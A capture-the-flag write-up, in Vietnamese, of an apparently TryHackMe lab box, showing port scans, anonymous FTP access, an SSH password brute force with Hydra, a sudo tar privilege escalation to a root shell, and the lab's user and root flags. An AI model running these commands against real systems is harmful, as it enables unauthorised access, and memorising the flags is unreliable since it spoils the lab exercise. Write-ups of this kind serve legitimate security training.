Recon
Nmap
# Nmap 7.95 scan initiated Wed Oct 16 20:59:35 2024 as: nmap -A -T3 -p 1-1000 -Pn -oN nmap.log 10.10.143.254
Nmap scan report for 10.10.143.254
Host is up (0.26s latency).
Not shown: 995 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.11.79.35
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 dc:f8:df:a7:a6:00:6d:18:b0:70:2b:a5:aa:a6:14:3e (RSA)
| 256 ec:c0:f2:d9:1e:6f:48:7d:38:9a:e3:bb:08:c4:0c:c9 (ECDSA)
|_ 256 a4:1a:15:a5:d4:b1:cf:8f:16:50:3a:7d:d0:d8:13:c2 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
990/tcp closed ftps
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Oct 16 21:00:30 2024 -- 1 IP address (1 host up) scanned in 54.51 secondsNuclei
[waf-detect:apachegeneric] [http] [info] http://10.10.143.254
[CVE-2023-48795] [javascript] [medium] 10.10.143.254:22 ["Vulnerable to Terrapin"]
[ssh-sha1-hmac-algo] [javascript] [info] 10.10.143.254:22
[ssh-server-enumeration] [javascript] [info] 10.10.143.254:22 ["SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.8"]
[ssh-password-auth] [javascript] [info] 10.10.143.254:22
[ftp-anonymous-login] [tcp] [medium] 10.10.143.254:21
[openssh-detect] [tcp] [info] 10.10.143.254:22 ["SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.8"]
[http-missing-security-headers:clear-site-data] [http] [info] http://10.10.143.254
[http-missing-security-headers:cross-origin-embedder-policy] [http] [info] http://10.10.143.254
[http-missing-security-headers:strict-transport-security] [http] [info] http://10.10.143.254
[http-missing-security-headers:x-frame-options] [http] [info] http://10.10.143.254
[http-missing-security-headers:x-content-type-options] [http] [info] http://10.10.143.254
[http-missing-security-headers:referrer-policy] [http] [info] http://10.10.143.254
[http-missing-security-headers:cross-origin-resource-policy] [http] [info] http://10.10.143.254
[http-missing-security-headers:content-security-policy] [http] [info] http://10.10.143.254
[http-missing-security-headers:permissions-policy] [http] [info] http://10.10.143.254
[http-missing-security-headers:x-permitted-cross-domain-policies] [http] [info] http://10.10.143.254
[http-missing-security-headers:cross-origin-opener-policy] [http] [info] http://10.10.143.254
[options-method] [http] [info] http://10.10.143.254 ["GET,HEAD,POST,OPTIONS"]
[apache-detect] [http] [info] http://10.10.143.254 ["Apache/2.4.18 (Ubuntu)"]Có thể thấy, FTP cho phép đăng nhập ẩn danh (anonymous).
Analysis
Có thể đăng nhập vào FTP sử dụng tài khoản ẩn danh:
ftp 10.10.143.254
Connected to 10.10.143.254.
220 (vsFTPd 3.0.3)
Name (10.10.143.254:aleister): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>Tìm thấy được 2 tập tin. Đầu tiên là task.txt với nội dung sau đây:
1.) Protect Vicious.
2.) Plan for Red Eye pickup on the moon.
-linTập tin thứ hai là locks.txt với nội dung sau đây:
rEddrAGON
ReDdr4g0nSynd!cat3
Dr@gOn$yn9icat3
R3DDr46ONSYndIC@Te
ReddRA60N
R3dDrag0nSynd1c4te
dRa6oN5YNDiCATE
ReDDR4g0n5ynDIc4te
R3Dr4gOn2044
RedDr4gonSynd1cat3
R3dDRaG0Nsynd1c@T3
Synd1c4teDr@g0n
reddRAg0N
REddRaG0N5yNdIc47e
Dra6oN$yndIC@t3
4L1mi6H71StHeB357
rEDdragOn$ynd1c473
DrAgoN5ynD1cATE
ReDdrag0n$ynd1cate
Dr@gOn$yND1C4Te
RedDr@gonSyn9ic47e
REd$yNdIc47e
dr@goN5YNd1c@73
rEDdrAGOnSyNDiCat3
r3ddr@g0N
ReDSynd1ca7eCó vẻ như đây là một word list.
Exploit
Sử dụng word list tìm được để thực hiện brute force SSH thông qua Hydra với tên tài khoản là lin:
hydra -l lin -P ./locks.txt ssh://10.10.143.254 -t 4 -I
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-10-16 21:13:46
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 4 tasks per 1 server, overall 4 tasks, 26 login tries (l:1/p:26), ~7 tries per task
[DATA] attacking ssh://10.10.143.254:22/
[22][ssh] host: 10.10.143.254 login: lin password: RedDr4gonSynd1cat3
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-10-16 21:13:57Đăng nhập vào SSH sử dụng password vừa tìm được và đọc flag của user:
lin@bountyhacker:~/Desktop$ cat user.txt
THM{CR1M3_SyNd1C4T3}Escalate
Thăm dò và biết được rằng ta có thể chạy tar với sudo:
lin@bountyhacker:/home$ cd /root
-bash: cd: /root: Permission denied
lin@bountyhacker:/home$ cat /proc/version
Linux version 4.15.0-101-generic (buildd@lgw01-amd64-052) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.12)) #102~16.04.1-Ubuntu SMP Mon May 11 11:38:16 UTC 2020
lin@bountyhacker:/home$ sudo -l
[sudo] password for lin:
Matching Defaults entries for lin on bountyhacker:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User lin may run the following commands on bountyhacker:
(root) /bin/tarSử dụng câu lệnh sau để leo lên root:
lin@bountyhacker:/home$ sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
tar: Removing leading `/' from member names
# whoami
rootĐọc flag của root:
# cat root.txt
THM{80UN7Y_h4cK3r}Flag(s)
User: THM{CR1M3_SyNd1C4T3}
Root: THM{80UN7Y_h4cK3r}